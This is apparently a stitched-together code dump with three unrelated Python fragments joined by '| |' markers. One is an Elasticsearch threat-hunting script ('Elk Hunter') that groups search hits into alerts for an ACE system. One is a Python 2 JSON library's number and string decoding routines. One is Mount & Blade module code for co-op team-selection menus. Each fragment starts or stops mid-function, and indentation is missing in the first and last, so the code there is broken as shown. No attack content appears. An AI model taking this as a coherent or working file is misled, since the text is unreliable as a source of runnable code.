for item in piped_search_output:
for key,value in item.items():
if x == 0:
if search_query.strip() != "":
search_query = '{} AND ({}:"{}"'.format(search_query,key,value)
else: #if no additional search text
search_query = '({}:"{}"'.format(key,value)
x = x + 1
else:
search_query = '{} OR {}:"{}"'.format(search_query,key,value)
search_query = '{})'.format(search_query)
#reinitialize so output isn't used again accidentally
piped_search_output = []
search_json,search_uri = self.search_to_json(search_query,search_index,filter_script,output_fields,earliest,latest,use_index_time,max_result_count)
#if not the last search, perform the query, rename fields if needed
if i != len(searches):
search_json['size'] = 10000
logging.debug("lucene search: {}".format(search_query))
search_result = self.perform_query(search_json,search_uri)
if not search_result:
if DAEMON_MODE:
self.last_executed_time = now
return False
results = search_result.json()["hits"]["hits"]
# if no results, then don't search again, just quit, but make sure we log that we ran it
if not results:
if DAEMON_MODE:
self.last_executed_time = now
return False
deduped_output = set()
if len(search_result.json()["hits"]["hits"]) > 9999:
logging.error("piped search results too big. >= 10000 results (elasticsearch limit). Exiting.")
if DAEMON_MODE:
self.last_executed_time = now
return False
for hit in results:
#if we are changing the field name, change it in the results
if output_field_rename:
current_field,new_field = output_field_rename.split(',')
current_hit = hit['_source'][current_field]
hit['_source'][new_field] = current_hit
del hit['_source'][current_field]
#only add items that do not exist (dedup/unique)
deduped_output.add(json.dumps(hit['_source']))
for n in deduped_output:
piped_search_output.append(json.loads(n))
logging.debug("lucene search: {}".format(search_query))
search_result = self.perform_query(search_json,search_uri)
if not search_result:
return False
# record the fact that we ran it
if DAEMON_MODE:
self.last_executed_time = now
# get group by value
if 'group_by' in self.config['rule']:
group_by_value = self.config['rule']['group_by']
else:
group_by_value = None
# group results
alerts = {}
tmp_key = 0
results = search_result.json()["hits"]["hits"]
for alert_result in results:
combined_results = {}
#####for any new fields defined from existing fields for output
if added_fields:
alert_result = self.addNewFieldsToResult(alert_result,added_fields)
if split_fields:
alert_result = self.addSplitFieldToResult(alert_result,split_fields)
if joined_fields:
alert_result = self.addJoinedFieldToResult(alert_result,joined_fields)
####
if "_source" in alert_result:
combined_results.update(alert_result["_source"])
if "fields" in alert_result:
combined_results.update(alert_result["fields"])
if group_by_value is None:
alerts[tmp_key] = [combined_results]
tmp_key += 1
elif group_by_value in combined_results:
if isinstance(combined_results[group_by_value], list):
tmp_key = ", ".join(combined_results[group_by_value])
else:
tmp_key = combined_results[group_by_value]
if tmp_key not in alerts:
alerts[tmp_key] = []
alerts[tmp_key].append(combined_results)
else:
alerts["null"] = combined_results
if alerts:
logging.debug("{}".format(json.dumps(alerts)))
else:
logging.debug("no results")
for alert_key in alerts.keys():
alert_title = '{} - {}'.format(self.config['rule']['name'], alert_key)
# alert type defaults to elk but you can override
alert_type = 'elk'
if 'type' in self.config['rule']:
alert_type = self.config['rule']['type']
alert = Alert(
tool='elk',
tool_instance='elk_hunter',
alert_type=alert_type,
desc=alert_title,
event_time=time.strftime("%Y-%m-%d %H:%M:%S"),
#details=alert_key,
details=alerts[alert_key],
name=self.config['rule']['name'],
company_name=CONFIG['ace']['company_name'],
company_id=CONFIG['ace'].getint('company_id'))
# extract tags
if 'tags' in self.config['rule']:
for tag in self.config['rule']['tags'].split(','):
alert.add_tag(tag)
# extract observables
for observables in alerts[alert_key]:
# is this observable type a temporal type?
o_time = observables['_time'] if '_time' in observables else None
if o_time is not None:
m = re.match(r'^([0-9]{4})-([0-9]{2})-([0-9]{2})T([0-9]{2}):([0-9]{2}):([0-9]{2})\.[0-9]{3}[-+][0-9]{2}:[0-9]{2}$', o_time)
if not m:
logging.error("_time field does not match expected format: {0}".format(o_time))
else:
# reformat this time for ACE
o_time = '{0}-{1}-{2} {3}:{4}:{5}'.format(
m.group(1),
m.group(2),
m.group(3),
m.group(4),
m.group(5),
m.group(6))
for o_field in self.config['observable_mapping'].keys():
if o_field not in observables:
logging.debug("field {} does not exist in event with observables {}".format(o_field,observables))
continue
o_type = self.config['observable_mapping'][o_field]
if isinstance(observables[o_field], list):
o_values = observables[o_field]
else:
o_values = [ observables[o_field] ]
for o_value in o_values:
# ignore values that are None, empty string or a single -
if o_value is None:
continue
# make sure this is a string
if not isinstance(o_value, str):
o_value = str(o_value)
if o_value.strip() == '' or o_value.strip() == '-':
continue
alert.add_observable(o_type,
o_value,
o_time if self.is_temporal_field(o_field) else None,
directives=self.get_field_directives(o_field))
if CONFIG['ace'].getboolean('enabled'):
try:
logging.info("submitting alert {}".format(alert.description))
alert.submit(CONFIG['ace']['uri'], CONFIG['ace']['key'])
except Exception as e:
logging.error("unable to submit alert {}: {}".format(alert, str(e)))
logging.debug(str(alert))
return True
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="Elk Hunter")
parser.add_argument('-b', '--base-directory', required=False, default=None, dest='base_dir',
help="Path to the base directory of the Elk Hunter tool. "
"Defaults to /opt/elk_hunter. "
"Override with ELK_HUNTER environment variable.")
parser.add_argument('-c', '--config', required=False, default='etc/elk_hunter.ini', dest='config_path',
help="Path to configuration file. Defaults to etc/elk_hunter.ini")
parser.add_argument('--logging-config', required=False, default='etc/logging.ini', dest='logging_config',
help="Path to logging configuration file. Defaults to etc/logging.ini")
parser.add_argument('-r', '--rules-dir', required=False, dest='rules_dir', action='append', default=[],
help="Path to rules directory. More than one can be specified. Defaults to rules/")
parser.add_argument('-d', '--daemon', required=False, default=False, action='store_true', dest='daemon',
help="Start as daemon running automated searches. Defaults to running individual searches as specified.")
parser.add_argument('--background', required=False, default=False, action='store_true', dest='background',
help="Run the background as a service. Only applies to --daemon.")
parser.add_argument('-k', '--kill', required=False, default=False, action='store_true', dest='kill',
help="Kill a running daemon.")
parser.add_argument('--earliest', required=False, default=None, dest='earliest',
help="Replace configuration specific earliest time. Time spec absolute format is MM/DD/YYYY:HH:MM:SS")
parser.add_argument('--latest', required=False, default=None, dest='latest',
help="Replace configuration specific latest time.")
parser.add_argument('-i', '--use-index-time', required=False, default=None, action='store_true', dest='use_index_time',
help="Use __index time specs instead.")
parser.add_argument("searches", nargs=argparse.REMAINDER, help="One or more searches to execute.")
#subparsers = parser.add_subparsers(dest='command') #title='subcommands', help='additional help')
#manual_search_commands = [ 'cli_search']
#manual_search_parser = subparsers.add_parser('cli_search',help='search with command line')
#manual_search_parser.add_argument('--search',action='store',required=True,help='the lucene search')
#manual_search_parser.add_argument('--index',action='store',required=True,help='the elasticsearch index to search')
#manual_search_parser.add_argument('--fields',action='store',help='print the following fields instead of the entire output <comma delimited list of fieldsi>')
#manual_search_parser.add_argument('--add-field',action='store',help='3 arguments comma separated. <new_field_name>,<field_name_to_match>,<regex to match>')
#manual_search_parser.add_argument('--join-fields-with',action='store',help='comma separated list | |
or ept is not None:
break
else:
decpt = k-j
elif c in 'eE':
if ept is not None:
break
else:
ept = k-j
elif c in '+-':
if not ept:
break
esign = c
else: #digit
if not ept:
sigdigits += 1
k += 1
number = s[j:k] # The entire number as a string
#print 'NUMBER IS: ', repr(number), ', sign', sign, ', esign', esign, \
# ', sigdigits', sigdigits, \
# ', decpt', decpt, ', ept', ept
# Handle octal integers first as an exception. If octal
# is not enabled (the ECMAScript standard) then just do
# nothing and treat the string as a decimal number.
if could_be_octal and self._allow_octal_numbers:
n = sign * decode_octal( number )
return n, k
# A decimal number. Do a quick check on JSON syntax restrictions.
if number[0] == '.' and not self._allow_initial_decimal_point:
raise JSONDecodeError('numbers in strict JSON must have at least one digit before the decimal point',s[i:])
elif number[0] == '0' and \
len(number) > 1 and number[1].isdigit():
if self._allow_octal_numbers:
raise JSONDecodeError('initial zero digit is only allowed for octal integers',s[i:])
else:
raise JSONDecodeError('initial zero digit must not be followed by other digits (octal numbers are not permitted)',s[i:])
# Make sure decimal point is followed by a digit
if decpt is not None:
if decpt+1 >= len(number) or not number[decpt+1].isdigit():
raise JSONDecodeError('decimal point must be followed by at least one digit',s[i:])
# Determine the exponential part
if ept is not None:
if ept+1 >= len(number):
raise JSONDecodeError('exponent in number is truncated',s[i:])
try:
exponent = int(number[ept+1:])
except ValueError:
raise JSONDecodeError('not a valid exponent in number',s[i:])
##print 'EXPONENT', exponent
else:
exponent = 0
# Try to make an int/long first.
if decpt is None and exponent >= 0:
# An integer
if ept:
n = int(number[:ept])
else:
n = int(number)
n *= sign
if exponent:
n *= 10**exponent
if n == 0 and sign < 0:
# minus zero, must preserve negative sign so make a float
n = -0.0
else:
try:
if decimal and (abs(exponent) > float_maxexp or sigdigits > float_sigdigits):
try:
n = decimal.Decimal(number)
n = n.normalize()
except decimal.Overflow:
if sign<0:
n = neginf
else:
n = inf
else:
n *= sign
else:
n = float(number) * sign
except ValueError:
raise JSONDecodeError('not a valid JSON numeric literal', s[i:j])
return n, k
def encode_number(self, n):
    """Render a Python number as a JSON numeric literal string.

    Integers, longs and decimal.Decimal values are emitted via str();
    ordinary floats via repr().  The non-finite values are translated
    to the JavaScript literals 'NaN', 'Infinity' and '-Infinity'.
    Complex numbers are accepted only when the imaginary part is zero
    (there is no ECMAScript complex type); otherwise JSONEncodeError
    is raised.  Any other type raises TypeError.
    """
    if isinstance(n, complex):
        # A complex with zero imaginary part degrades to its real part.
        if n.imag:
            raise JSONEncodeError('Can not encode a complex number that has a non-zero imaginary part',n)
        n = n.real
    if isinstance(n, (int,long)):
        return str(n)
    # decimal may be None if the module could not be imported.
    if decimal and isinstance(n, decimal.Decimal):
        return str(n)
    global nan, inf, neginf
    # Fast path: identity match against the module's canonical specials.
    for special, literal in ((nan, 'NaN'), (inf, 'Infinity'), (neginf, '-Infinity')):
        if n is special:
            return literal
    if isinstance(n, float):
        # In Python nan == inf == -inf can compare confusingly, so the
        # non-finite values are told apart by inspecting repr().
        text = repr(n).lower()
        if ('inf' in text and '-' in text) or n == neginf:
            return '-Infinity'
        if 'inf' in text or n is inf:
            return 'Infinity'
        if 'nan' in text or n is nan:
            return 'NaN'
        return repr(n)
    raise TypeError('encode_number expected an integral, float, or decimal number type',type(n))
def decode_string(self, s, i=0, imax=None):
    """Intermediate-level decoder for JSON string literals.

    Takes a string and a starting index, and returns a Python
    string (or unicode string) and the index of the next unparsed
    character.

    The literal at s[i] must open with a quote character; single
    quotes are accepted only when _allow_single_quoted_strings is
    set.  Escape handling honors the decoder's configured options
    (JS-style escapes, octal escapes, \\x hex escapes, literal
    control characters).  Raises JSONDecodeError on any malformed
    or disallowed literal.
    """
    if imax is None:
        imax = len(s)
    # Need at least an opening and a closing quote.
    if imax < i+2 or s[i] not in '"\'':
        raise JSONDecodeError('string literal must be properly quoted',s[i:])
    closer = s[i]
    if closer == '\'' and not self._allow_single_quoted_strings:
        raise JSONDecodeError('string literals must use double quotation marks in strict JSON',s[i:])
    i += 1 # skip quote
    # Pick the escape table matching the configured escape dialect.
    if self._allow_js_string_escapes:
        escapes = self._escapes_js
    else:
        escapes = self._escapes_json
    ccallowed = self._allow_control_char_in_string
    chunks = []
    _append = chunks.append  # bound method hoisted for speed in the loop
    done = False
    high_surrogate = None  # pending first half of a UTF-16 surrogate pair
    while i < imax:
        c = s[i]
        # Make sure a high surrogate is immediately followed by a low surrogate
        if high_surrogate and (i+1 >= imax or s[i:i+2] != '\\u'):
            raise JSONDecodeError('High unicode surrogate must be followed by a low surrogate',s[i:])
        if c == closer:
            i += 1 # skip end quote
            done = True
            break
        elif c == '\\':
            # Escaped character
            i += 1
            if i >= imax:
                raise JSONDecodeError('escape in string literal is incomplete',s[i-1:])
            c = s[i]
            if '0' <= c <= '7' and self._allow_octal_numbers:
                # Handle octal escape codes first so special \0 doesn't kick in yet.
                # Follow Annex B.1.2 of ECMAScript standard.
                if '0' <= c <= '3':
                    maxdigits = 3
                else:
                    maxdigits = 2
                # Scan forward over at most maxdigits octal digits; k ends
                # one past the last digit (or at imax).
                for k in range(i, i+maxdigits+1):
                    if k >= imax or s[k] not in octaldigits:
                        break
                n = decode_octal(s[i:k])
                if n < 128:
                    _append( chr(n) )
                else:
                    _append( unichr(n) )
                i = k
                continue
            if escapes.has_key(c):
                # Simple one-character escape (\n, \t, \", ...).
                _append(escapes[c])
                i += 1
            elif c == 'u' or c == 'x':
                # Numeric character escape: \uXXXX or (JS only) \xXX.
                i += 1
                if c == 'u':
                    digits = 4
                else: # c== 'x'
                    if not self._allow_js_string_escapes:
                        raise JSONDecodeError(r'string literals may not use the \x hex-escape in strict JSON',s[i-1:])
                    digits = 2
                if i+digits >= imax:
                    raise JSONDecodeError('numeric character escape sequence is truncated',s[i-1:])
                n = decode_hex( s[i:i+digits] )
                if high_surrogate:
                    # Decode surrogate pair and clear high surrogate
                    _append( surrogate_pair_as_unicode( high_surrogate, unichr(n) ) )
                    high_surrogate = None
                elif n < 128:
                    # ASCII chars always go in as a str
                    _append( chr(n) )
                elif 0xd800 <= n <= 0xdbff: # high surrogate
                    # The matching low surrogate (\uXXXX) must follow immediately.
                    if imax < i + digits + 2 or s[i+digits] != '\\' or s[i+digits+1] != 'u':
                        raise JSONDecodeError('High unicode surrogate must be followed by a low surrogate',s[i-2:])
                    high_surrogate = unichr(n) # remember until we get to the low surrogate
                elif 0xdc00 <= n <= 0xdfff: # low surrogate
                    # NOTE(review): message reads "proceeded"; likely meant "preceded".
                    raise JSONDecodeError('Low unicode surrogate must be proceeded by a high surrogate',s[i-2:])
                else:
                    # Other chars go in as a unicode char
                    _append( unichr(n) )
                i += digits
            else:
                # Unknown escape sequence
                if self._allow_nonescape_characters:
                    # Lenient mode: keep the character, drop the backslash.
                    _append( c )
                    i += 1
                else:
                    raise JSONDecodeError('unsupported escape code in JSON string literal',s[i-1:])
        elif ord(c) <= 0x1f: # A control character
            if self.islineterm(c):
                raise JSONDecodeError('line terminator characters must be escaped inside string literals',s[i:])
            elif ccallowed:
                _append( c )
                i += 1
            else:
                raise JSONDecodeError('control characters must be escaped inside JSON string literals',s[i:])
        else: # A normal character; not an escape sequence or end-quote.
            # Find a whole sequence of "safe" characters so we can append them
            # all at once rather than one a time, for speed.
            j = i
            i += 1
            while i < imax and s[i] not in unsafe_string_chars and s[i] != closer:
                i += 1
            _append(s[j:i])
    if not done:
        raise JSONDecodeError('string literal is not terminated with a quotation mark',s)
    s = ''.join( chunks )
    return s, i
def encode_string(self, s):
"""Encodes a Python string into a JSON string literal.
"""
# Must handle instances of UserString specially in order to be
# able to use ord() on its simulated "characters".
import UserString
if isinstance(s, (UserString.UserString, UserString.MutableString)):
def tochar(c):
return c.data
else:
# Could use "lambda c:c", but that is too slow. So we set to None
# and use an explicit if test inside the loop.
tochar = None
chunks = []
chunks.append('"')
revesc = self._rev_escapes
asciiencodable = self._asciiencodable
encunicode = self._encode_unicode_as_escapes
i = 0
imax = len(s)
while i < imax:
if tochar:
c = tochar(s[i])
else:
c = s[i]
cord = ord(c)
if cord < 256 and asciiencodable[cord] and isinstance(encunicode, bool):
# Contiguous runs of plain old printable ASCII can be copied
# directly to the JSON output without worry (unless the user
# has supplied | |
s0, 3),
(else_try),
(eq, ":cur_ai_troop_index", 8),
(overlay_set_val, reg0, "$coop_class_4_wanted"),
(assign, "$g_presentation_obj_commander_select_21", reg0),
(str_store_class_name, s0, 4),
(else_try),
(eq, ":cur_ai_troop_index", 9),
(overlay_set_val, reg0, "$coop_class_5_wanted"),
(assign, "$g_presentation_obj_commander_select_22", reg0),
(str_store_class_name, s0, 5),
(else_try),
(eq, ":cur_ai_troop_index", 10),
(overlay_set_val, reg0, "$coop_class_6_wanted"),
(assign, "$g_presentation_obj_commander_select_23", reg0),
(str_store_class_name, s0, 6),
(else_try),
(eq, ":cur_ai_troop_index", 11),
(overlay_set_val, reg0, "$coop_class_7_wanted"),
(assign, "$g_presentation_obj_commander_select_24", reg0),
(str_store_class_name, s0, 7),
(else_try),
(eq, ":cur_ai_troop_index", 12),
(overlay_set_val, reg0, "$coop_class_8_wanted"),
(assign, "$g_presentation_obj_commander_select_25", reg0),
(str_store_class_name, s0, 8),
(try_end),
(create_text_overlay, reg0, "str_s0", 0), #s0
(overlay_set_color, reg0, 0xFFFFFF),
(position_set_x, pos1, 430),
(position_set_y, pos1, ":cur_y"),
(overlay_set_position, reg0, pos1),
(val_sub, ":cur_y", escape_menu_item_height),#escape_menu_item_height
(try_end),
(val_sub, ":cur_y", escape_menu_item_height),
(try_end),
(presentation_set_duration, 999999),
]),
(ti_on_presentation_event_state_change,
[(store_trigger_param_1, ":object"),
(store_trigger_param_2, ":value"),
(try_begin),
(eq, ":object", "$g_presentation_obj_commander_select_11"),
(presentation_set_duration, 0),
(else_try),
(eq, ":object", "$g_presentation_obj_commander_select_13"),
(assign, "$g_multiplayer_bot_type_1_wanted", ":value"),
(multiplayer_send_2_int_to_server, multiplayer_event_set_bot_selection, slot_player_bot_type_1_wanted, ":value"),
(else_try),
(eq, ":object", "$g_presentation_obj_commander_select_14"),
(assign, "$g_multiplayer_bot_type_2_wanted", ":value"),
(multiplayer_send_2_int_to_server, multiplayer_event_set_bot_selection, slot_player_bot_type_2_wanted, ":value"),
(else_try),
(eq, ":object", "$g_presentation_obj_commander_select_15"),
(assign, "$g_multiplayer_bot_type_3_wanted", ":value"),
(multiplayer_send_2_int_to_server, multiplayer_event_set_bot_selection, slot_player_bot_type_3_wanted, ":value"),
(else_try),
(eq, ":object", "$g_presentation_obj_commander_select_16"),
(assign, "$g_multiplayer_bot_type_4_wanted", ":value"),
(multiplayer_send_2_int_to_server, multiplayer_event_set_bot_selection, slot_player_bot_type_4_wanted, ":value"),
(else_try),
(eq, ":object", "$g_presentation_obj_commander_select_17"),
(assign, "$coop_class_0_wanted", ":value"),
(multiplayer_send_2_int_to_server, multiplayer_event_set_bot_selection, slot_player_coop_class_0_wanted, ":value"),
(else_try),
(eq, ":object", "$g_presentation_obj_commander_select_18"),
(assign, "$coop_class_1_wanted", ":value"),
(multiplayer_send_2_int_to_server, multiplayer_event_set_bot_selection, slot_player_coop_class_1_wanted, ":value"),
(else_try),
(eq, ":object", "$g_presentation_obj_commander_select_19"),
(assign, "$coop_class_2_wanted", ":value"),
(multiplayer_send_2_int_to_server, multiplayer_event_set_bot_selection, slot_player_coop_class_2_wanted, ":value"),
(else_try),
(eq, ":object", "$g_presentation_obj_commander_select_20"),
(assign, "$coop_class_3_wanted", ":value"),
(multiplayer_send_2_int_to_server, multiplayer_event_set_bot_selection, slot_player_coop_class_3_wanted, ":value"),
(else_try),
(eq, ":object", "$g_presentation_obj_commander_select_21"),
(assign, "$coop_class_4_wanted", ":value"),
(multiplayer_send_2_int_to_server, multiplayer_event_set_bot_selection, slot_player_coop_class_4_wanted, ":value"),
(else_try),
(eq, ":object", "$g_presentation_obj_commander_select_22"),
(assign, "$coop_class_5_wanted", ":value"),
(multiplayer_send_2_int_to_server, multiplayer_event_set_bot_selection, slot_player_coop_class_5_wanted, ":value"),
(else_try),
(eq, ":object", "$g_presentation_obj_commander_select_23"),
(assign, "$coop_class_6_wanted", ":value"),
(multiplayer_send_2_int_to_server, multiplayer_event_set_bot_selection, slot_player_coop_class_6_wanted, ":value"),
(else_try),
(eq, ":object", "$g_presentation_obj_commander_select_24"),
(assign, "$coop_class_7_wanted", ":value"),
(multiplayer_send_2_int_to_server, multiplayer_event_set_bot_selection, slot_player_coop_class_7_wanted, ":value"),
(else_try),
(eq, ":object", "$g_presentation_obj_commander_select_25"),
(assign, "$coop_class_8_wanted", ":value"),
(multiplayer_send_2_int_to_server, multiplayer_event_set_bot_selection, slot_player_coop_class_8_wanted, ":value"),
(try_end),
]),
(ti_on_presentation_run,
[
## this causes an error sometimes
## (multiplayer_get_my_player, ":my_player_no"),
## (player_get_gold, ":player_gold", ":my_player_no"),
## (call_script, "script_multiplayer_calculate_cur_selected_items_cost", ":my_player_no", 1),
## (try_begin),
## (ge, ":player_gold", reg0),
## (overlay_set_color, "$g_presentation_obj_commander_select_12", 0xFFFFFF),
## (else_try),
## (overlay_set_color, "$g_presentation_obj_commander_select_12", 0xFF0000),
## (try_end),
(try_begin),
(key_clicked, key_escape),
(presentation_set_duration, 0),
(try_end),
]),
]),
############################################################
("coop_team_select", prsntf_manual_end_only, 0, [
(ti_on_presentation_load,
[(set_fixed_point_multiplier, 1000),
(create_mesh_overlay, reg0, "mesh_mp_ingame_menu"),
(position_set_x, pos1, 250),
(position_set_y, pos1, 80),
(overlay_set_position, reg0, pos1),
(position_set_x, pos1, 1000),
(position_set_y, pos1, 1000),
(overlay_set_size, reg0, pos1),
(str_clear, s0),
(create_text_overlay, "$g_presentation_obj_team_select_container", s0, tf_scrollable_style_2),
(position_set_x, pos1, 285),
(position_set_y, pos1, 125),
(overlay_set_position, "$g_presentation_obj_team_select_container", pos1),
(position_set_x, pos1, 405),
(position_set_y, pos1, 500),
(overlay_set_area_size, "$g_presentation_obj_team_select_container", pos1),
(set_container_overlay, "$g_presentation_obj_team_select_container"),
(assign, ":cur_y", 450),
(create_text_overlay, reg0, "str_choose_a_faction", 0),
(overlay_set_color, reg0, 0xFFFFFF),
(position_set_x, pos1, 0),
(position_set_y, pos1, ":cur_y"),
(overlay_set_position, reg0, pos1),
(val_sub, ":cur_y", escape_menu_item_height),
(position_set_y, pos1, ":cur_y"),
(position_set_x, pos1, 100),
(multiplayer_get_my_player, ":my_player_no"),
(team_get_faction, ":script_param_2", 0),
(str_store_faction_name, s0, ":script_param_2"),
(create_button_overlay, "$g_presentation_obj_team_select_1", s0, 0),
(try_begin),
(call_script, "script_cf_multiplayer_team_is_available", ":my_player_no", 0),
(overlay_set_color, "$g_presentation_obj_team_select_1", 0xFFFFFF),
(overlay_set_hilight_color, "$g_presentation_obj_team_select_1", 0x55FF50),
(assign, "$g_multiplayer_team_select_1_available", 1),
(else_try),
(overlay_set_color, "$g_presentation_obj_team_select_1", 0x888888),
(overlay_set_hilight_color, "$g_presentation_obj_team_select_1", 0x888888),
(assign, "$g_multiplayer_team_select_1_available", 0),
(try_end),
(position_set_y, pos1, ":cur_y"),
(overlay_set_position, "$g_presentation_obj_team_select_1", pos1),
(val_sub, ":cur_y", escape_menu_item_height),
(position_set_y, pos1, ":cur_y"),
(team_get_faction, ":script_param_2", 1),
(str_store_faction_name, s0, ":script_param_2"),
(create_button_overlay, "$g_presentation_obj_team_select_2", s0, 0),
(try_begin),
(call_script, "script_cf_multiplayer_team_is_available", ":my_player_no", 1),
(overlay_set_color, "$g_presentation_obj_team_select_2", 0xFFFFFF),
(overlay_set_hilight_color, "$g_presentation_obj_team_select_2", 0x55FF50),
(assign, "$g_multiplayer_team_select_2_available", 1),
(else_try),
(overlay_set_color, "$g_presentation_obj_team_select_2", 0x888888),
(overlay_set_hilight_color, "$g_presentation_obj_team_select_2", 0x888888),
(assign, "$g_multiplayer_team_select_2_available", 0),
(try_end),
(overlay_set_position, "$g_presentation_obj_team_select_2", pos1),
(val_sub, ":cur_y", escape_menu_item_height),
(position_set_y, pos1, ":cur_y"),
(create_button_overlay, "$g_presentation_obj_team_select_3", "str_spectator", 0),
(overlay_set_color, "$g_presentation_obj_team_select_3", 0xFFFFFF),
(overlay_set_position, "$g_presentation_obj_team_select_3", pos1),
(val_sub, ":cur_y", escape_menu_item_height),
(position_set_y, pos1, ":cur_y"),
(presentation_set_duration, 999999),
]),
(ti_on_presentation_event_state_change,
[(store_trigger_param_1, ":object"),
(multiplayer_get_my_player, ":my_player_no"),
(try_begin),
(eq, "$g_waiting_for_confirmation_to_terminate", 0),
(try_begin),
(eq, ":object", "$g_presentation_obj_team_select_1"),
(try_begin),
(call_script, "script_cf_multiplayer_team_is_available", ":my_player_no", 0),
(try_begin),
(player_get_team_no, ":my_team", ":my_player_no"),
(neq, ":my_team", 0),
(assign, "$g_confirmation_result", 0),
(assign, "$g_waiting_for_confirmation_to_terminate", 1),
(player_get_troop_id, "$g_confirmation_troop_backup", ":my_player_no"),
(player_get_team_no, "$g_confirmation_team_backup", ":my_player_no"),
(player_set_troop_id, ":my_player_no", -1),
(multiplayer_send_int_to_server, multiplayer_event_change_team_no, 0),
(player_set_team_no, ":my_player_no", 0),
(assign, "$coop_my_team", 0), #
(else_try),
(presentation_set_duration, 0),
(start_presentation, "prsnt_coop_troop_select"),
(try_end),
(try_end),
(else_try),
(eq, ":object", "$g_presentation_obj_team_select_2"),
(try_begin),
(call_script, "script_cf_multiplayer_team_is_available", ":my_player_no", 1),
(try_begin),
(player_get_team_no, ":my_team", ":my_player_no"),
(neq, ":my_team", 1),
(assign, "$g_confirmation_result", 0),
(assign, "$g_waiting_for_confirmation_to_terminate", 1),
(player_get_troop_id, "$g_confirmation_troop_backup", ":my_player_no"),
(player_get_team_no, "$g_confirmation_team_backup", ":my_player_no"),
(player_set_troop_id, ":my_player_no", -1),
(multiplayer_send_int_to_server, multiplayer_event_change_team_no, 1),
(player_set_team_no, ":my_player_no", 1),
(assign, "$coop_my_team", 1), #
(else_try),
(presentation_set_duration, 0),
(start_presentation, "prsnt_coop_troop_select"),
(try_end),
(try_end),
(else_try),
(eq, ":object", "$g_presentation_obj_team_select_3"),
(player_set_troop_id, ":my_player_no", -1),
(multiplayer_send_int_to_server, multiplayer_event_change_team_no, multi_team_spectator),
(player_set_team_no, ":my_player_no", multi_team_spectator),
(assign, "$coop_my_team", multi_team_spectator), #
(presentation_set_duration, 0),
(try_end),
(try_end),
]),
(ti_on_presentation_run,
[
(multiplayer_get_my_player, ":my_player_no"),
(try_begin),
(key_clicked, key_escape),
(eq, "$g_waiting_for_confirmation_to_terminate", 0),
(multiplayer_get_my_team, ":my_team"),
(try_begin),
(eq, ":my_team", multi_team_unassigned),
(player_set_troop_id, ":my_player_no", -1),
(multiplayer_send_int_to_server, multiplayer_event_change_team_no, multi_team_spectator),
(player_set_team_no, ":my_player_no", multi_team_spectator),
(try_end),
(presentation_set_duration, 0),
(else_try),
(eq, "$g_waiting_for_confirmation_to_terminate", 1),
(eq, "$g_confirmation_result", 1),
(assign, "$g_waiting_for_confirmation_to_terminate", 0),
(assign, "$g_confirmation_result", 0),
(presentation_set_duration, 0),
# coop only show troop select if heroes are available
(multiplayer_get_my_team, ":my_team"),
(try_begin),
(eq, ":my_team", 0),
(party_get_num_companion_stacks, ":num_heroes", coop_temp_party_enemy_heroes),
(gt, ":num_heroes", 0),
(start_presentation, "prsnt_coop_troop_select"),
(else_try),
(eq, ":my_team", 1),
(party_get_num_companion_stacks, ":num_heroes", coop_temp_party_ally_heroes),
(gt, ":num_heroes", 0),
(start_presentation, "prsnt_coop_troop_select"),
(try_end),
(else_try),
(eq, "$g_waiting_for_confirmation_to_terminate", 1),
(eq, "$g_confirmation_result", -1),
#return troop and team back to the old state
(player_set_troop_id, ":my_player_no", "$g_confirmation_troop_backup"),
(player_set_team_no, ":my_player_no", "$g_confirmation_team_backup"),
(assign, "$g_waiting_for_confirmation_to_terminate", 0),
(assign, "$g_confirmation_result", 0),
(presentation_set_duration, 0),
(start_presentation, "prsnt_coop_team_select"),
(else_try),
(assign, ":do_refresh", 0),
(try_begin),
(call_script, "script_cf_multiplayer_team_is_available", ":my_player_no", 0),
(try_begin),
(eq, "$g_multiplayer_team_select_1_available", 0),
(assign, ":do_refresh", 1),
(try_end),
(else_try),
#not available
(try_begin),
(eq, "$g_multiplayer_team_select_1_available", 1),
(assign, ":do_refresh", 1),
(try_end),
(try_end),
(try_begin),
(call_script, "script_cf_multiplayer_team_is_available", ":my_player_no", 1),
(try_begin),
(eq, "$g_multiplayer_team_select_2_available", 0),
(assign, ":do_refresh", 1),
(try_end),
(else_try),
#not available
(try_begin),
(eq, "$g_multiplayer_team_select_2_available", 1),
(assign, ":do_refresh", 1),
(try_end),
(try_end),
(eq, ":do_refresh", 1),
(presentation_set_duration, 0),
(start_presentation, "prsnt_coop_team_select"),
(try_end),
]),
]),
("coop_start_battle", prsntf_manual_end_only, 0, [
(ti_on_presentation_load,
[(set_fixed_point_multiplier, 1000),
(assign, "$g_presentation_obj_start_battle_1", -1),
(try_begin),
(create_in_game_button_overlay, "$g_presentation_obj_start_battle_1", "@Start battle.", 0),
(overlay_set_color, "$g_presentation_obj_start_battle_1", 0xFFFFFF),
(position_set_x, pos1, 500),
(position_set_y, pos1, 700),
(overlay_set_position, "$g_presentation_obj_start_battle_1", pos1),
(try_end),
(presentation_set_duration, 999999),
]),
(ti_on_presentation_event_state_change,
[(store_trigger_param_1, ":object"),
(try_begin),
(eq, ":object", "$g_presentation_obj_start_battle_1"),
(multiplayer_send_int_to_server, multiplayer_event_coop_send_to_server, coop_event_start_battle),
(presentation_set_duration, 0),
(try_end),
]),
(ti_on_presentation_run,
[
(eq, "$coop_battle_started", 1),
(presentation_set_duration, 0),
]),
]),
("coop_welcome_message", prsntf_manual_end_only, 0, [
(ti_on_presentation_load,
[(set_fixed_point_multiplier, 1000),
(str_store_welcome_message, s0),
(try_begin),
(neg|str_is_empty, s0),
(eq, "$g_multiplayer_welcome_message_shown", 0),
(create_mesh_overlay, reg0, "mesh_mp_ui_welcome_panel"),
(position_set_x, pos1, 200),
(position_set_y, pos1, 400),
(overlay_set_position, reg0, pos1),
(create_text_overlay, reg0, s0, tf_scrollable),
(overlay_set_color, reg0, 0xFFFFFF),
(position_set_x, pos1, 230),
(position_set_y, pos1, 425),
(overlay_set_position, reg0, pos1),
(position_set_x, pos1, 540),
(position_set_y, pos1, 150),
(overlay_set_area_size, reg0, pos1),
(presentation_set_duration, 999999),
(else_try),
(eq, "$g_multiplayer_show_server_rules", 1),
(create_mesh_overlay, reg0, "mesh_mp_ui_welcome_panel"),
(position_set_x, pos1, 200),
(position_set_y, pos1, 400),
(overlay_set_position, reg0, pos1),
(try_begin),
(neg|str_is_empty, s0),
(str_clear, s3),
(str_store_string, s2, s0),
(str_store_string, s2, "str_s2_s3"),
(str_store_string, s2, "str_s2_s3"),
(else_try),
(str_clear, s2),
(try_end),
(str_store_string, s3, "@Game Rules:^"),
